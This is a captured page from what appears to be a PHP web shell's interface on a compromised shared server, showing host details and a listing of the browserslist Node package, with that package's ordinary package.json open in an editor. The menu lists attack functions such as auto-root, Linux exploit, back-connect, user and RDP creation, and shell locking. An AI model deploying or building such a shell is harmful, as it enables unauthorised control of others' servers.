Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
browserslist /
[ HOME SHELL ]
Name
Size
Permission
Action
browser.js
1.05
KB
-rw-r--r--
browserslist.1
940
B
-rw-r--r--
cli.js
4.06
KB
-rwxr-xr-x
error.d.ts
155
B
-rw-r--r--
error.js
299
B
-rw-r--r--
index.d.ts
3.86
KB
-rw-r--r--
index.js
33.29
KB
-rw-r--r--
node.js
10.77
KB
-rw-r--r--
package.json
2.96
KB
-rw-r--r--
pnpm-lock.yaml
62.14
KB
-rw-r--r--
update-db.js
8.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "browserslist", "version": "4.19.3", "description": "Share target browsers between different front-end tools, like Autoprefixer, Stylelint and babel-env-preset", "keywords": [ "caniuse", "browsers", "target" ], "funding": { "type": "opencollective", "url": "https://opencollective.com/browserslist" }, "author": "Andrey Sitnik <andrey@sitnik.ru>", "license": "MIT", "repository": "browserslist/browserslist", "scripts": { "test": "c8 pnpm unit && eslint . && size-limit", "unit": "NODE_ENV=test uvu test .test.js", "unit:fast": "NODE_ENV=test uvu test '^[^/]+.test.js'" }, "dependencies": { "caniuse-lite": "^1.0.30001312", "electron-to-chromium": "^1.4.71", "escalade": "^3.1.1", "node-releases": "^2.0.2", "picocolors": "^1.0.0" }, "engines": { "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" }, "bin": { "browserslist": "cli.js" }, "types": "./index.d.ts", "devDependencies": { "@logux/eslint-config": "^46.1.1", "@size-limit/preset-small-lib": "^7.0.8", "c8": "^7.11.0", "clean-publish": "^4.0.0", "cross-spawn": "^7.0.3", "eslint": "^8.9.0", "eslint-config-standard": "^16.0.3", "eslint-plugin-es5": "^1.5.0", "eslint-plugin-import": "^2.25.4", "eslint-plugin-node": "^11.1.0", "eslint-plugin-prefer-let": "^3.0.1", "eslint-plugin-promise": "^6.0.0", "fs-extra": "^10.0.0", "nanoid": "^3.3.1", "nanospy": "^0.5.0", "size-limit": "^7.0.8", "uvu": "^0.5.3" }, "browser": { "./node.js": "./browser.js", "path": false }, "clean-publish": { "cleanDocs": true }, "c8": { "exclude": [ "**/*.test.*" ], "lines": 100, "reporter": "lcov", "check-coverage": true }, "size-limit": [ { "path": "index.js", "limit": "14 KB" } ], "eslintConfig": { "plugins": [ "es5" ], "extends": [ "@logux/eslint-config", "plugin:es5/no-es2015" ], "rules": { "prefer-let/prefer-let": "off", "prefer-arrow-callback": "off", "node/global-require": "off", "object-shorthand": "off", "no-console": "off", "no-var": "off" }, "overrides": [ { "files": "test/**/*", "rules": { "node/no-unsupported-features/es-syntax": "off", "es5/no-shorthand-properties": "off", "es5/no-template-literals": "off", "es5/no-rest-parameters": "off", "es5/no-arrow-functions": "off", "es5/no-destructuring": "off", "es5/no-block-scoping": "off", "es5/no-es6-methods": "off", "es5/no-spread": "off", "es5/no-for-of": "off", "no-console": "off" } } ] }, "eslintIgnore": [ "test/fixtures" ], "prettier": { "arrowParens": "avoid", "jsxSingleQuote": false, "quoteProps": "consistent", "semi": false, "singleQuote": true, "trailingComma": "none" } }
Close